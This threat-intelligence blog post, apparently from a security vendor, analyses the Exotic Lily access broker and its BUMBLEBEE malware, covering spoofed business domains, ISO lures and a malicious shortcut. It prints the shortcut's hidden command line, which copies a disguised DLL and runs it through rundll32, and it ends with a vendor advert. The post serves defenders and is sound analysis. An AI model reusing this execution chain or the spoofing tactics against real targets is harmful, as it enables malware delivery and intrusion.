In the month of September 2021, Google TAG researchers discovered a financially motivated threat actor, Exotic LILY. These threat actors were exploiting zero-days in Microsoft’s MSHTML (CVE-2021-40444)
Exotic Lily is an Initial access broker. These threat actors specialize in breaching a company and then selling the access to the highest bidder, and among the interested parties who bid for the same, were Conti and Diavol ransomware groups. To breach such companies, it was observed that Exotic Lily was using mass emailing/spoofing campaigns (5000+ emails per day) to attack more than 600 companies. Exotic Lily shifted its focus from IT, Healthcare, and cybersecurity companies to a broader spectrum of companies. Exotic Lily has an unusual level of human interaction while performing these campaigns. Based on the working hours of the group, it can be concluded that the group was from the Eastern/Central European region.
A few days ago, Google TAG Researchers spotted ISO files being used as malware delivery methods. These were specifically made to deliver Bazaar loader DLL files.
File transfer services like OneDrive, TransferNow, and WeTransfer were used to send out these malicious ISO files as attachments in the mass email campaigning.
The malware is called BUMBLEBEE because it uses a unique user agent, “bumblebee”. BUMBLEBEE uses Windows Management Instrumentation to collect the system data, and then exfiltrate the data in a JSON format. Once this is done, the malware waits for commands from the CNC server. It was also noticed that the CNC server deploys a Cobalt Strike payload.
Exotic Lily used identity spoofing to make fake domains of legitimate businesses by replacing TLD with “.us”, “.co”, or “.biz”. Then the attackers would pose as real company employees by coping their data from sites like LinkedIn, RocketReach, and Crunchbase.
This slide states the initial contact between the attackers and the victims.
Mounting the ISO file gives us 2 files.
At first the Attachment file looks like a shortcut, nothing wrong, huh?
When we opened the shortcuts panel, we discovered the target field with some command.
C:\Windows\System32\cmd.exe /c xcopy /y DumpStack.log c:\programdata\ && C:\Windows\System32\rundll32.exe C:\programdata\DumpStack.log,spload && exit
cmd /c C:\Users\user\AppData\Local\Temp\Attachments.lnk
C:\Windows\System32\cmd.exe" /c xcopy /y DumpStack.log c:\programdata\ && C:\Windows\System32\rundll32.exe
C:\programdata\DumpStack.log,spload && exit
xcopy /y DumpStack.log c:\programdata\
Compiler time stamp: Tue Jan 18 13:47:09 2022 UTC
DumpStack.log: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Exports by the pe file as indicated by pestudio.
spload ------> Function called by the DumpStack.log file.
VerSprite’s Threat Intelligence Group provides organizations with real-time threat monitoring, analysis, prevention recommendations, and mitigation. Our elite team works with companies across all industries and security maturity levels to defend against threats. For more information on Versprite’s Threat Intel Group or our botnet detection service, BreachSeeker, contact one of our security advisers today. Learn More →